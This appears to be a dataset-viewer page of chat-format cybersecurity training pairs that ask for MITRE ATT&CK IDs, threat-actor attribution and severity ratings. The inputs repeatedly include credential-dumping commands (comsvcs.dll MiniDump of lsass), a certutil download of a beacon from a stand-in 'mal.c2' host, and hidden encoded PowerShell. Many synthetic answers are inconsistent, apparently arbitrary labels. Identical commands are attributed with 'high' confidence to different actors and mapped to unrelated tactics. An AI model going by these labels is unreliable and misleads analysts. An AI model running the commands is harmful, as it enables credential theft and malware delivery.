messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-21JUTVHRSC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Impact",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2138 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3650 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-CD3EZ75AOJ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence, Command and Control",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1892 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: auditpol.exe may also be used to set audit policies.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.002\", \"T1562\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Green Lambert can use shell scripts for execution, such as /bin/sh -c.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.004\", \"T1059\"]}",
"role": "assistant"
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Conti has the ability to discover hosts on a target network.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1018\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 798 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"}"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In Windows, Net utility, Set-LocalUser and Set-ADAccountPassword PowerShell cmdlets may be used by adversaries to modify user accounts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"tech... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confiden... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Lazarus Group has renamed system utilities such as wscript.exe and mshta.exe.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.003\", \"T1036\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3719 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.119.62.32",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1531\"]}... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.90.23.248",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"technique... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2689 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\",... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: !ProcessList List running processes, including their PID, parent PID, executable name and priority !SendFileToServer Uploads a specified file to the C2 server !CaptureScreen Takes a screenshot that it saves to a file a... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-7ABFJE4UKN)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Configure browsers/applications to regularly delete persistent web cookies.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1606\", \"T1606.001\"]}",
"role": "assistant"
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: WellMail can identify the IP address of the victim system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.181.149.193",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Cobalt Strike's Beacon payload can collect information on process details.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.",
"role": "user"
},
{
"content": "{\"tactics... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-WQ287OT126)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2854 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: It writes encrypted data to %APPDATA%\\Intel\\Skype.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1125\", \"T1123\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.44.7.245",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0005\", \"TA0040\"], \"techniques\": [\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3509 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1582 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": ... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected hos... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-HIPXZUAUTD)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.104.80.95",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0006\"], \"techniques... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode.",
"role": "user"
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: AADInternals can send phishing emails containing malicious links designed to collect users’ credentials.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1598\", \"T1598.003\"]}",
"role"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-3493SPWH4O)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Command and Control, Defense Evasion",
"role": "user"
},
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-YO6GRYMGCB)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Collection",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Data loss prevention can detect and block sensitive data being copied to USB devices.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1052\", \"T1052.001\"]}",
"role": "ass... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: NETWIRE can discover and close windows on controlled systems.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1010\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-Y82MOBBR10)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Persistence",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MarkiRAT can upload data from the victim's machine to the C2 server.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-OTUCTWGY8M)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery, Command and Control",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3984 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.96.23.172",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0001\", \"TA0043\"], \... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.44.60.227",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", ... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised.",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-IW453VEZY5)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"con... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1485\"]}",
"role": "assista... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may modify plist files to automatically run an application when a user logs in.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547\", \"T1547.00... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.64.34.61",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0009\"], ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-LF49RYSIZA)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"conf... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.80.47.203",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 661 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 583 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"co... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.102.87.140",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1570\"]}",
"rol... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: environmental keying",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1480\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-DSU6G6USRO)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Defense Evasion",
"role": "user"
},
{
"c... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2410 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.11.183.132",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-CVN3KW4BK1)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\": \"Ex... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\\\SYSVOL\\\\Policies\\.",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor file systems for changes to application binaries and invalid checksums/signatures.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.006\", \"T1546\"]}",... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: And, according to the collected config files, the group upgraded their malware communications from plain text http to encrypted https in October 2013",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-73UG1GPTGM)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Collection, Command and Control",
"role": "user... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: TEMP.Veles has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.52.208.221",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0010\"], \"techn... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: SeaDuke has been packed with the UPX packer.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence\": \"Hi... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-8F76BI5DEP)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Initial Access, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-57FYESKD7K)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution, Lateral Movement, Impact",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-PTTK02W4CH)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Execution",
"role": "user"
},
{
"content": "{\"severit... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-IDCAUSFQWF)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-OC1PV4QWZ9)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Critica... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1666 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-7KAOWM5CXA)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Impact, Initial Access",
"role": "user"
},
{
"conte... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Enforce the principle of least privilege by limiting container dashboard access to only the necessary users.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0005\"], \"techniques\": [\"T1... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-4NPEGPBAC9)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Collection, Discovery",
"role": "user"
},
{
"content... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}",
"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-AB8LYTEFH4)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Reconnaissance, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-02MLOZ7VW9)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Command and Control, Discovery, Persistence",
"role": "user"
},
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3460 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.61.136.26",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-OW9PIPB76N)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Discovery",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 929 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT33 has used FTP to exfiltrate files (separately from the C2 channel).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1048.003\", \"T1048\"]}",
"role": "assistant"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.31.122.190",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0009\"], \"techniqu... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In 2016, CTU researchers observed the group using native system functionality to disable logging processes and delete logs within a compromised environment",
"role": "user"
},
{
"content": "{\"tactics\": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: LiteDuke has been packed with multiple layers of encryption.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.84.230.35",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0004\"], \"techni... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.